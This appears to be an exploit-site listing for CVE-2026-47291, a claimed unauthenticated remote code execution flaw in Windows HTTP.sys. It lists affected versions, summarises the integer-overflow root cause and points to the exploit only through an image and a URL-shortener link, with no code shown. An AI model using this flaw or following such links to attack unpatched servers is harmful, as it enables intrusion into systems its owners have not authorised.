Exploit for Heap-based Buffer Overflow in Microsoft CVE-2026-47291

Name: Exploit for Heap-based Buffer Overflow in Microsoft CVE-2026-47291
Rating: 5 (8 reviews)

2026-06-10 | CVSS 9.8

## https://sploitus.com/exploit?id=4116E80D-924A-5725-8D0C-07D1C0469E98
## CVE-2026-47291

### Overview
RCE exploit for CVE-2026-47291 targeting Windows HTTP.sys. Triggers a heap-based buffer overflow through integer overflow in request processing. Delivers arbitrary code execution in the HTTP.sys context with one crafted packet. No authentication needed.

Tested on Windows 10/11 and Server editions prior to the June 2026 patch.

### Affected Versions
| OS | Versions |
|----|----------|
| Windows 10 | 21H2, 22H2, 1607, 1809 |
| Windows 11 | 23H2, 24H2, 25H2, 26H1 |
| Windows Server | 2012 / 2012 R2 / 2016 / 2019 / 2022 / 2025 (pre-patch) |

### Root Cause
Integer overflow (CWE-190) in HTTP.sys during Content-Length and chunked encoding handling leads to insufficient buffer allocation. Subsequent memcpy-style operation results in heap overflow (CWE-122), allowing controlled overwrite of adjacent structures and reliable RIP control.

### Usage
[![52A7ACE0-B027-466B-B387-CEC36A0CE1B2.png](https://i.postimg.cc/Xq27CBx5/52A7ACE0-B027-466B-B387-CEC36A0CE1B2.png)](https://postimg.cc/7J2kv6FP)

### Exploit
[href](https://tinyurl.com/3te2nubh)

### Disclaimer 
This exploit is intended solely for authorized penetration testing, red team operations, and security research on systems you own or have explicit permission to test. Unauthorized use is prohibited. Use at your own risk.